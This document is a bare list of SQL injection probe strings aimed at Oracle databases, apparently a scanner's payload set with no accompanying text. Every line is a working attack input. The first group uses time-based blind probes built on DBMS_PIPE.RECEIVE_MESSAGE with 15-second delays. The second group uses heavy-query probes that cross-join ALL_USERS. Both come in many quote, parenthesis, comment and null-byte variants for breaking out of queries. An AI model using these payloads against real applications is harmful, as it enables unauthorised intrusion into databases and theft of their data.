(..'""'"('
'nNJC<'">xLxn
) AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)
') AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)
' AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)
" AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)
) AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND (3371=3371
)) AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND ((5090=5090
))) AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND (((8249=8249
 AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)
') AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND ('RqIu'='RqIu
')) AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND (('zqdh'='zqdh
'))) AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND ((('GuPZ'='GuPZ
' AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND 'DMxi'='DMxi
') AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND ('YcDY' LIKE 'YcDY
')) AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND (('iUXf' LIKE 'iUXf
'))) AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND ((('dQCc' LIKE 'dQCc
' AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND 'GpaB' LIKE 'GpaB
") AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND ("OzQj"="OzQj
")) AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND (("yppx"="yppx
"))) AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND ((("uLmV"="uLmV
" AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND "fkNe"="fkNe
") AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND ("NbIV" LIKE "NbIV
")) AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND (("MLIc" LIKE "MLIc
"))) AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND ((("pgKR" LIKE "pgKR
" AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND "CfzV" LIKE "CfzV
%') AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND ('%'='
%')) AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND (('%'='
%'))) AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND ((('%'='
%' AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND '%'='
%") AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND ("%"="
%")) AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND (("%"="
%"))) AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND ((("%"="
%" AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND "%"="
%00') AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND ('btER'='btER
%00')) AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND (('sJbM'='sJbM
%00'))) AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND ((('BRHC'='BRHC
%00' AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15) AND 'duwH'='duwH
 AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)-- XnEC
 AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)# SvXE
') WHERE 2750=2750 AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)-- 
") WHERE 9703=9703 AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)-- 
) WHERE 7611=7611 AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)-- 
' WHERE 4244=4244 AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)-- 
" WHERE 9441=9441 AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)-- 
 WHERE 7484=7484 AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)-- 
')) AS WgFB WHERE 9454=9454 AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)-- 
")) AS QhFc WHERE 6862=6862 AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)-- 
)) AS oXgX WHERE 3837=3837 AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)-- 
') AS XOyi WHERE 2300=2300 AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)-- 
") AS TVhL WHERE 1481=1481 AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)-- 
) AS kVZt WHERE 3485=3485 AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)-- 
'||(SELECT 'aYuY' FROM DUAL WHERE 5827=5827 AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15))||'
'||(SELECT 'qpTZ' WHERE 1583=1583 AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15))||'
'+(SELECT agtU WHERE 4023=4023 AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15))+'
'+(SELECT 'yUDT' WHERE 5363=5363 AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15))+'
' IN BOOLEAN MODE) AND 3393=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(110)||CHR(122),15)#
) AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
') AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
' AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
" AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
)) AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
))) AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
 AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
')) AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
'))) AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
") AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
")) AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
"))) AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
%') AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
%')) AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
%'))) AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
%' AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
%") AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
%")) AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
%"))) AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
%" AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
%00') AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
%00')) AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
%00'))) AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
%00' AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
') WHERE 1174=1174 AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
") WHERE 8756=8756 AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
) WHERE 4187=4187 AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
' WHERE 4612=4612 AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
" WHERE 2821=2821 AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
 WHERE 4731=4731 AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
')) AS CoKs WHERE 3396=3396 AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
")) AS Uswa WHERE 5838=5838 AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
)) AS mVHG WHERE 5000=5000 AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
') AS IagY WHERE 2808=2808 AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
") AS GBnL WHERE 5140=5140 AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
) AS yiUc WHERE 9024=9024 AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
'||(SELECT 'tGaf' FROM DUAL WHERE 2282=2282 AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
'||(SELECT 'pXzA' WHERE 8672=8672 AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
'+(SELECT auKy WHERE 2368=2368 AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
'+(SELECT 'xdvX' WHERE 5852=5852 AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
' IN BOOLEAN MODE) AND 7095=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(116)||CHR(87)||CHR(113),15)--
) AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
') AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
' AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
" AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
) AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (4448=4448
)) AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((5394=5394
))) AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (((2281=2281
 AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
') AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('TXIO'='TXIO
')) AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('wRRo'='wRRo
'))) AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('AUaV'='AUaV
' AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'DwuN'='DwuN
') AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('vzTL' LIKE 'vzTL
')) AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('BkVA' LIKE 'BkVA
'))) AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('NdsX' LIKE 'NdsX
' AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'DcQU' LIKE 'DcQU
") AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ("uxam"="uxam
")) AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (("XhlB"="XhlB
"))) AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((("MYYY"="MYYY
" AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND "NvPJ"="NvPJ
") AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ("UuBi" LIKE "UuBi
")) AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (("CwOf" LIKE "CwOf
"))) AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((("vlKr" LIKE "vlKr
" AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND "Pukp" LIKE "Pukp
%') AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('%'='
%')) AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('%'='
%'))) AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('%'='
%' AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND '%'='
%") AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ("%"="
%")) AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (("%"="
%"))) AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((("%"="
%" AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND "%"="
%00') AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('pTDJ'='pTDJ
%00')) AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('gwEL'='gwEL
%00'))) AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('gdLE'='gdLE
%00' AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'Uqou'='Uqou
 AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- ggsj
 AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)# ENDH
') WHERE 5544=5544 AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
") WHERE 2521=2521 AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
) WHERE 6781=6781 AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
' WHERE 5418=5418 AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
" WHERE 3188=3188 AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
 WHERE 4442=4442 AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
')) AS YKks WHERE 7790=7790 AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
")) AS xpqh WHERE 3217=3217 AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
)) AS AnVe WHERE 6475=6475 AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
') AS UOLE WHERE 6207=6207 AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
") AS gdnu WHERE 4002=4002 AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
) AS sUId WHERE 1990=1990 AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
'||(SELECT 'Qotj' FROM DUAL WHERE 2972=2972 AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5))||'
'||(SELECT 'XBxk' WHERE 5593=5593 AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5))||'
'+(SELECT diwv WHERE 4137=4137 AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5))+'
'+(SELECT 'rHhP' WHERE 2000=2000 AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5))+'
' IN BOOLEAN MODE) AND 8471=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)#
) AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
') AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
' AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
" AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
)) AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
))) AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
 AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
')) AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'))) AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
") AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
")) AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
"))) AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%') AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%')) AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%'))) AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%' AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%") AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%")) AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%"))) AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%" AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%00') AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%00')) AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%00'))) AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%00' AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
') WHERE 7678=7678 AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
") WHERE 3141=3141 AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
) WHERE 2463=2463 AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
' WHERE 6522=6522 AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
" WHERE 2208=2208 AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
 WHERE 3433=3433 AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
')) AS STZd WHERE 9150=9150 AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
")) AS KiXr WHERE 5190=5190 AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
)) AS zLyl WHERE 7377=7377 AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
') AS YUyt WHERE 6070=6070 AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
") AS VGlT WHERE 7268=7268 AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
) AS sipt WHERE 1782=1782 AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'||(SELECT 'fZkX' FROM DUAL WHERE 1999=1999 AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'||(SELECT 'HzeE' WHERE 4370=4370 AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'+(SELECT iMbX WHERE 4218=4218 AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
